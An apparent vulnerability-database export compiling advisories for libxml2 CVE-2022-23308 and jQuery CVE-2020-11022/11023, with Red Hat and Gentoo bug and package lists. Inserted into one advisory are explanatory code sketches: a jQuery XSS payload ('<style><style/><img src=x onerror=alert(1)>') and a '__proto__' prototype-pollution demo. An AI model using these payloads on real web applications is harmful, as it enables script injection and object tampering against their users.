"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.1,
"url": "https://open-policy-agent.github.io/gatekeeper/website/docs/howto/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3200"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28153"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.1,
"url": "https://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.1,
"url": "https://open-policy-agent.github.io/gatekeeper/website/docs/howto/."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43565"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3580"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/libxml2/2.9.12+dfsg-4ubuntu0.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/libxml2/2.9.4+dfsg1-6.1ubuntu1.5"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5324-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/libxml2/2.9.10+dfsg-5ubuntu0.20.04.2"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412332"
},
{
"db": "VULMON",
"id": "CVE-2022-23308"
},
{
"db": "PACKETSTORM",
"id": "168719"
},
{
"db": "PACKETSTORM",
"id": "167185"
},
{
"db": "PACKETSTORM",
"id": "166327"
},
{
"db": "PACKETSTORM",
"id": "166437"
},
{
"db": "PACKETSTORM",
"id": "166805"
},
{
"db": "PACKETSTORM",
"id": "166489"
},
{
"db": "PACKETSTORM",
"id": "166304"
},
{
"db": "CNNVD",
"id": "CNNVD-202202-1722"
},
{
"db": "NVD",
"id": "CVE-2022-23308"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-412332",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2022-23308",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168719",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167185",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166327",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166437",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166805",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166489",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166304",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202202-1722",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-23308",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-02-26T00:00:00",
"db": "VULHUB",
"id": "VHN-412332",
"ident": null
},
{
"date": "2022-02-26T00:00:00",
"db": "VULMON",
"id": "CVE-2022-23308",
"ident": null
},
{
"date": "2022-10-17T13:50:28",
"db": "PACKETSTORM",
"id": "168719",
"ident": null
},
{
"date": "2022-05-17T16:57:57",
"db": "PACKETSTORM",
"id": "167185",
"ident": null
},
{
"date": "2022-03-16T16:44:24",
"db": "PACKETSTORM",
"id": "166327",
"ident": null
},
{
"date": "2022-03-24T14:40:17",
"db": "PACKETSTORM",
"id": "166437",
"ident": null
},
{
"date": "2022-04-21T15:10:14",
"db": "PACKETSTORM",
"id": "166805",
"ident": null
},
{
"date": "2022-03-28T15:52:16",
"db": "PACKETSTORM",
"id": "166489",
"ident": null
},
{
"date": "2022-03-14T18:59:28",
"db": "PACKETSTORM",
"id": "166304",
"ident": null
},
{
"date": "2022-02-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202202-1722",
"ident": null
},
{
"date": "2022-02-26T05:15:08.280000",
"db": "NVD",
"id": "CVE-2022-23308",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-11-02T00:00:00",
"db": "VULHUB",
"id": "VHN-412332",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2022-23308",
"ident": null
},
{
"date": "2023-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202202-1722",
"ident": null
},
{
"date": "2025-05-05T17:17:56.523000",
"db": "NVD",
"id": "CVE-2022-23308",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202202-1722"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "libxml2 Resource Management Error Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202202-1722"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202202-1722"
}
],
"trust": 0.6
}
}
VAR-202004-2191
Vulnerability from variot - Updated: 2026-03-09 21:54 In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery contains a cross-site scripting vulnerability: information may be obtained and information may be tampered with. jQuery is an open source, cross-browser JavaScript library developed by the American programmer John Resig. The library simplifies interaction between HTML and JavaScript, and supports modularization and plug-in extension. The vulnerability stems from the web application's failure to properly validate client-supplied data. An attacker could exploit this vulnerability to execute client-side code. 8) - aarch64, noarch, ppc64le, s390x, x86_64
- Description:
The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.3 Release Notes linked from the References section. Bugs fixed (https://bugzilla.redhat.com/):
1376706 - restore SerialNumber tag in caManualRenewal xml 1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests 1406505 - KRA ECC installation failed with shared tomcat 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip 1666907 - CC: Enable AIA OCSP cert checking for entire cert chain 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1695901 - CVE-2019-10179 pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1706521 - CA - SubjectAltNameExtInput does not display text fields to the enrollment page 1710171 - CVE-2019-10146 pki-core: Reflected XSS in 'path length' constraint field in CA's Agent page 1721684 - Rebase pki-servlet-engine to 9.0.30 1724433 - caTransportCert.cfg contains MD2/MD5withRSA as signingAlgsAllowed. 1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA 1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. 
1777579 - CVE-2020-1721 pki-core: KRA vulnerable to reflected XSS via the getPk12 page 1805541 - [RFE] CA Certificate Transparency with Embedded Signed Certificate Time stamp 1817247 - Upgrade to 10.8.3 breaks PKI Tomcat Server 1821851 - [RFE] Provide SSLEngine via JSSProvider for use with PKI 1822246 - JSS - NativeProxy never calls releaseNativeResources - Memory Leak 1824939 - JSS: add RSA PSS support - RHEL 8.3 1824948 - add RSA PSS support - RHEL 8.3 1825998 - CertificatePoliciesExtDefault MAX_NUM_POLICIES hardcoded limit 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1842734 - CVE-2019-10179 pki-core: pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab [rhel-8] 1842736 - CVE-2019-10146 pki-core: Reflected Cross-Site Scripting in 'path length' constraint field in CA's Agent page [rhel-8] 1843537 - Able to Perform PKI CLI operations like cert request and approval without nssdb password 1845447 - pkispawn fails in FIPS mode: AJP connector has secretRequired="true" but no secret 1850004 - CVE-2020-11023 jquery: Passing HTML containing elements to manipulation methods could result in untrusted code execution 1854043 - /usr/bin/PrettyPrintCert is failing with a ClassNotFoundException 1854959 - ca-profile-add with Netscape extensions nsCertSSLClient and nsCertEmail in the profile gets stuck in processing 1855273 - CVE-2020-15720 pki: Dogtag's python client does not validate certificates 1855319 - Not able to launch pkiconsole 1856368 - kra-key-generate request is failing 1857933 - CA Installation is failing with ncipher v12.30 HSM 1861911 - pki cli ca-cert-request-approve hangs over crmf request from client-cert-request 1869893 - Common certificates are missing in CS.cfg on shared PKI instance 1871064 - replica install failing during pki-ca component configuration 1873235 - pki ca-user-cert-add with secure port failed with 
'SSL_ERROR_INAPPROPRIATE_FALLBACK_ALERT'
- You can also manage user accounts for web applications, mobile applications, and RESTful web services. Description:
Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Description:
Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. Bugs fixed (https://bugzilla.redhat.com/):
1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests 1430365 - [RFE] Host-group names command rename 1488732 - fake_mname in named.conf is no longer effective 1585020 - Enable compat tree to provide information about AD users and groups on trust agents 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip 1651577 - [WebUI] IPA Error 3007: RequirmentError" while adding members in "User ID overrides" tab 1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute 1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1701233 - [RFE] support setting supported signature methods on the token 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1746830 - Memory leak during search of idview overrides 1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch 1751295 - When sync-repl is enabled, slapi-nis can deadlock during retrochanglog trimming 1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn't work in GUI (it works only from CLI) 1759888 - Rebase OpenDNSSEC to 2.1 1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED 1777806 - When Service weight is set as 0 for server in IPA location "IPA Error 903: InternalError" is displayed 1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service 1801698 - [RFE] Changing default hostgroup is too easy 1802471 - SELinux policy for ipa-custodia 1809835 - RFE: ipa group-add-member: number of failed should also be emphasized 1810154 - RFE: ipa-backup should compare locally and 
globally installed server roles 1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time 1813330 - ipa-restore does not restart httpd 1816784 - KRA install fails if all KRA members are Hidden Replicas 1818765 - [Rebase] Rebase ipa to 4.8.6+ 1818877 - [Rebase] Rebase to softhsm 2.6.0+ 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1831732 - AVC avc: denied { dac_override } for comm="ods-enforcerd 1831935 - AD authentication with IdM against SQL Server 1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11 1833266 - [dirsrv] set 'nsslapd-enable-upgrade-hash: off' as this raises warnings 1834264 - BIND rebase: rebuild against new so version 1834909 - softhsm use-after-free on process exit 1845211 - Rebase bind-dyndb-ldap to 11.3 1845537 - IPA bind configuration issue 1845596 - ipa trust-add fails with 'Fetching domains from trusted forest failed' 1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts 1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7 1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn 1849914 - FreeIPA - Utilize 256-bit AJP connector passwords 1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition 1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2 1853263 - ipa-selinux package missing 1857157 - replica install failing with avc denial for custodia component 1858318 - AttributeError: module 'ssl' has no attribute 'SSLCertVerificationError' when upgrading ca-less ipa master 1859213 - AVC denial during ipa-adtrust-install --add-agents 1863079 - ipa-epn command displays 'exception: ConnectionRefusedError: [Errno 111] Connection refused' 1863616 - CA-less install does not set required permissions on KDC certificate 1866291 - EPN: enhance input validation 1866938 - ipa-epn fails to retrieve user data if some 
user attributes are not present 1868432 - Unhandled Python exception in '/usr/libexec/ipa/ipa-pki-retrieve-key' 1869311 - ipa trust-add fails with 'Fetching domains from trusted forest failed' 1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less 1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain 1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin. 1879604 - pkispawn logs files are empty
-
Gentoo Linux Security Advisory GLSA 202007-03
https://security.gentoo.org/
Severity: Normal
Title: Cacti: Multiple vulnerabilities
Date: July 26, 2020
Bugs: #728678, #732522
ID: 202007-03
Synopsis
Multiple vulnerabilities have been found in Cacti, the worst of which could result in the arbitrary execution of code.
Background
Cacti is a complete frontend to rrdtool.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-analyzer/cacti < 1.2.13 >= 1.2.13
2 net-analyzer/cacti-spine < 1.2.13 >= 1.2.13
-------------------------------------------------------------------
2 affected packages
Description
Multiple vulnerabilities have been discovered in Cacti. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All Cacti users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-analyzer/cacti-1.2.13"
All Cacti Spine users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=net-analyzer/cacti-spine-1.2.13"
References
[ 1 ] CVE-2020-11022 https://nvd.nist.gov/vuln/detail/CVE-2020-11022
[ 2 ] CVE-2020-11023 https://nvd.nist.gov/vuln/detail/CVE-2020-11023
[ 3 ] CVE-2020-14295 https://nvd.nist.gov/vuln/detail/CVE-2020-14295
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202007-03
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2020 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Solution:
Before applying this update, ensure all previously released errata relevant to your system have been applied.
See the following documentation, which will be updated shortly for release 3.11.219, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html
This update is available via the Red Hat Network.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Red Hat Virtualization security, bug fix, and enhancement update
Advisory ID: RHSA-2020:3807-01
Product: Red Hat Virtualization
Advisory URL: https://access.redhat.com/errata/RHSA-2020:3807
Issue date: 2020-09-23
CVE Names: CVE-2020-8203 CVE-2020-11022 CVE-2020-11023 CVE-2020-14333
====================================================================

1. Summary:
An update is now available for Red Hat Virtualization Engine 4.4.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4 - noarch
- Description:
The org.ovirt.engine-root is a core component of oVirt.
The following packages have been upgraded to a later upstream version: ansible-runner-service (1.0.5), org.ovirt.engine-root (4.4.2.3), ovirt-engine-dwh (4.4.2.1), ovirt-engine-extension-aaa-ldap (1.4.1), ovirt-engine-ui-extensions (1.2.3), ovirt-log-collector (4.4.3), ovirt-web-ui (1.6.4), rhvm-branding-rhv (4.4.5), rhvm-dependencies (4.4.1), vdsm-jsonrpc-java (1.5.5). (BZ#1674420, BZ#1866734)
A list of bugs fixed in this update is available in the Technical Notes book:
https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/html-single/technical_notes
Security Fix(es):
- nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203)
- jquery: Cross-site scripting in jQuery.htmlPrefilter method (CVE-2020-11022)
- jQuery: passing HTML containing elements to manipulation methods could result in untrusted code execution (CVE-2020-11023)
- ovirt-engine: Reflected cross site scripting vulnerability (CVE-2020-14333)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
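The jQuery flaw fixed in 3.5.0 (CVE-2020-11022) is easiest to see in the old htmlPrefilter step, which rewrote XHTML-style self-closing tags before parsing. The snippet below is a minimal sketch in plain JavaScript: the regex approximates jQuery's pre-3.5.0 source and the payload string is an illustrative example, so treat it as a demonstration of the tag-expansion problem rather than jQuery's exact code path.

```javascript
// CVE-2020-11022 demo: jQuery < 3.5.0 ran every HTML string through
// htmlPrefilter, expanding self-closing tags with a regex like this one
// (approximated from the pre-3.5.0 source).
const rxhtmlTag = /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi;
const oldPrefilter = (html) => html.replace(rxhtmlTag, "<$1></$2>");

// A sanitizer may consider this string inert: the <img> sits inside a
// <style> element, where browsers treat it as CSS text, not markup.
const sanitized = "<style><style/><img src=x onerror=alert(1)>";

const mutated = oldPrefilter(sanitized);
console.log(mutated);
// "<style><style></style><img src=x onerror=alert(1)>"
// The rewrite closes the <style> context early, so when the result is
// parsed, the <img> becomes a real element and its onerror handler can
// fire. jQuery 3.5.0 changed htmlPrefilter to leave the string unchanged.
```

Passing such a string to `.html()` or `.append()` on a patched jQuery (>= 3.5.0) leaves the markup unexpanded, which is why upgrading, rather than sanitizing alone, is the recommended fix.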
Bug Fix(es):
- Cannot assign direct LUN from FC storage - grayed out (BZ#1625499)
- VM portal always asks how to open console.vv even it has been set to default application. (BZ#1638217)
- RESTAPI Not able to remove the QoS from a disk profile (BZ#1643520)
- On OVA import, qemu-img fails to write to NFS storage domain (BZ#1748879)
- Possible missing block path for a SCSI host device needs to be handled in the UI (BZ#1801206)
- Scheduling Memory calculation disregards huge-pages (BZ#1804037)
- Engine does not reduce scheduling memory when a VM with dynamic hugepages runs. (BZ#1804046)
- In Admin Portal, "Huge Pages (size: amount)" needs to be clarified (BZ#1806339)
- Refresh LUN is using host from different Data Center to scan the LUN (BZ#1838051)
- Unable to create Windows VM's with Mozilla Firefox version 74.0.1 and greater for RHV-M GUI/Webadmin portal (BZ#1843234)
- [RHV-CNV] - NPE when creating new VM in cnv cluster (BZ#1854488)
- [CNV&RHV] Add-Disk operation failed to complete. (BZ#1855377)
- Cannot create KubeVirt VM as a normal user (BZ#1859460)
- Welcome page - remove Metrics Store links and update "Insights Guide" link (BZ#1866466)
- [RHV 4.4] Change in CPU model name after RHVH upgrade (BZ#1869209)
- VM vm-name is down with error. Exit message: unsupported configuration: Can't add USB input device. USB bus is disabled. (BZ#1871235)
- spec_ctrl host feature not detected (BZ#1875609)
Enhancement(s):
- [RFE] API for changed blocks/sectors for a disk for incremental backup usage (BZ#1139877)
- [RFE] Improve workflow for storage migration of VMs with multiple disks (BZ#1749803)
- [RFE] Move the Remove VM button to the drop down menu when viewing details such as snapshots (BZ#1763812)
- [RFE] enhance search filter for Storage Domains with free argument (BZ#1819260)
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/2974891
- Bugs fixed (https://bugzilla.redhat.com/):
1625499 - Cannot assign direct LUN from FC storage - grayed out 1638217 - VM portal always asks how to open console.vv even it has been set to default application. 1643520 - RESTAPI Not able to remove the QoS from a disk profile 1674420 - [RFE] - add support for Cascadelake-Server CPUs (and IvyBridge) 1748879 - On OVA import, qemu-img fails to write to NFS storage domain 1749803 - [RFE] Improve workflow for storage migration of VMs with multiple disks 1758024 - Long running Ansible tasks timeout and abort for RHV-H hosts with STIG/Security Profiles applied 1763812 - [RFE] Move the Remove VM button to the drop down menu when viewing details such as snapshots 1778471 - Using more than one asterisk in LDAP search string is not working when searching for AD users. 1787854 - RHV: Updating/reinstall a host which is part of affinity labels is removed from the affinity label. 1801206 - Possible missing block path for a SCSI host device needs to be handled in the UI 1803856 - [Scale] ovirt-vmconsole takes too long or times out in a 500+ VM environment. 1804037 - Scheduling Memory calculation disregards huge-pages 1804046 - Engine does not reduce scheduling memory when a VM with dynamic hugepages runs. 
1806339 - In Admin Portal, "Huge Pages (size: amount)" needs to be clarified 1816951 - [CNV&RHV] CNV VM migration failure is not handled correctly by the engine 1819260 - [RFE] enhance search filter for Storage Domains with free argument 1826255 - [CNV&RHV]Change name of type of provider - CNV -> OpenShift Virtualization 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1831949 - RESTAPI javadoc contains missing information about assigning IP address to NIC 1831952 - RESTAPI contains malformed link around JSON representation fo the cluster 1831954 - RESTAPI javadoc contains malformed link around oVirt guest agent 1831956 - RESTAPI javadoc contains malformed link around time zone representation 1838051 - Refresh LUN is using host from different Data Center to scan the LUN 1841112 - not able to upload vm from OVA when there are 2 OVA from the same vm in same directory 1843234 - Unable to create Windows VM's with Mozilla Firefox version 74.0.1 and greater for RHV-M GUI/Webadmin portal 1850004 - CVE-2020-11023 jQuery: passing HTML containing elements to manipulation methods could result in untrusted code execution 1854488 - [RHV-CNV] - NPE when creating new VM in cnv cluster 1855377 - [CNV&RHV] Add-Disk operation failed to complete. 1857412 - CVE-2020-8203 nodejs-lodash: prototype pollution in zipObjectDeep function 1858184 - CVE-2020-14333 ovirt-engine: Reflected cross site scripting vulnerability 1859460 - Cannot create KubeVirt VM as a normal user 1860907 - Upgrade bundled GWT to 2.9.0 1866466 - Welcome page - remove Metrics Store links and update "Insights Guide" link 1866734 - [DWH] Rebase bug - for the 4.4.2 release 1869209 - [RHV 4.4] Change in CPU model name after RHVH upgrade 1869302 - ansible 2.9.12 - host deploy fixes 1871235 - VM vm-name is down with error. Exit message: unsupported configuration: Can't add USB input device. USB bus is disabled. 
1875609 - spec_ctrl host feature not detected 1875851 - Web Admin interface broken on Firefox ESR 68.11
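CVE-2020-8203, listed above for nodejs-lodash, is a prototype-pollution bug: `zipObjectDeep` assigns values along caller-supplied property paths. The helper below is a hypothetical minimal sketch of that unguarded deep-assignment pattern, not lodash's actual implementation:

```javascript
// Minimal sketch (NOT lodash's code) of the deep-path assignment pattern
// behind CVE-2020-8203. Nothing filters "__proto__", so an attacker-chosen
// path can reach Object.prototype.
function setPath(obj, path, value) {
  const keys = path.split(".");
  let cur = obj;
  for (let i = 0; i < keys.length - 1; i++) {
    // Create intermediate objects as needed, then descend.
    if (typeof cur[keys[i]] !== "object" || cur[keys[i]] === null) {
      cur[keys[i]] = {};
    }
    cur = cur[keys[i]]; // for "__proto__" this lands on Object.prototype
  }
  cur[keys[keys.length - 1]] = value;
  return obj;
}

// Equivalent in spirit to _.zipObjectDeep(["__proto__.polluted"], [true]):
setPath({}, "__proto__.polluted", true);
console.log({}.polluted); // true — every plain object now inherits the key
```

Patched lodash releases (and similar deep-merge utilities) mitigate this class of bug by refusing `__proto__`, `constructor`, and `prototype` path segments before assignment.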
- Package List:
RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4:
Source: ansible-runner-service-1.0.5-1.el8ev.src.rpm ovirt-engine-4.4.2.3-0.6.el8ev.src.rpm ovirt-engine-dwh-4.4.2.1-1.el8ev.src.rpm ovirt-engine-extension-aaa-ldap-1.4.1-1.el8ev.src.rpm ovirt-engine-ui-extensions-1.2.3-1.el8ev.src.rpm ovirt-log-collector-4.4.3-1.el8ev.src.rpm ovirt-web-ui-1.6.4-1.el8ev.src.rpm rhvm-branding-rhv-4.4.5-1.el8ev.src.rpm rhvm-dependencies-4.4.1-1.el8ev.src.rpm vdsm-jsonrpc-java-1.5.5-1.el8ev.src.rpm
noarch: ansible-runner-service-1.0.5-1.el8ev.noarch.rpm ovirt-engine-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-backend-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-dbscripts-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-dwh-4.4.2.1-1.el8ev.noarch.rpm ovirt-engine-dwh-grafana-integration-setup-4.4.2.1-1.el8ev.noarch.rpm ovirt-engine-dwh-setup-4.4.2.1-1.el8ev.noarch.rpm ovirt-engine-extension-aaa-ldap-1.4.1-1.el8ev.noarch.rpm ovirt-engine-extension-aaa-ldap-setup-1.4.1-1.el8ev.noarch.rpm ovirt-engine-health-check-bundler-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-restapi-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-base-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-cinderlib-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-imageio-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-ovirt-engine-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-ovirt-engine-common-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-vmconsole-proxy-helper-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-setup-plugin-websocket-proxy-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-tools-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-tools-backup-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-ui-extensions-1.2.3-1.el8ev.noarch.rpm ovirt-engine-vmconsole-proxy-helper-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-webadmin-portal-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-engine-websocket-proxy-4.4.2.3-0.6.el8ev.noarch.rpm ovirt-log-collector-4.4.3-1.el8ev.noarch.rpm ovirt-web-ui-1.6.4-1.el8ev.noarch.rpm python3-ovirt-engine-lib-4.4.2.3-0.6.el8ev.noarch.rpm rhvm-4.4.2.3-0.6.el8ev.noarch.rpm rhvm-branding-rhv-4.4.5-1.el8ev.noarch.rpm rhvm-dependencies-4.4.1-1.el8ev.noarch.rpm vdsm-jsonrpc-java-1.5.5-1.el8ev.noarch.rpm
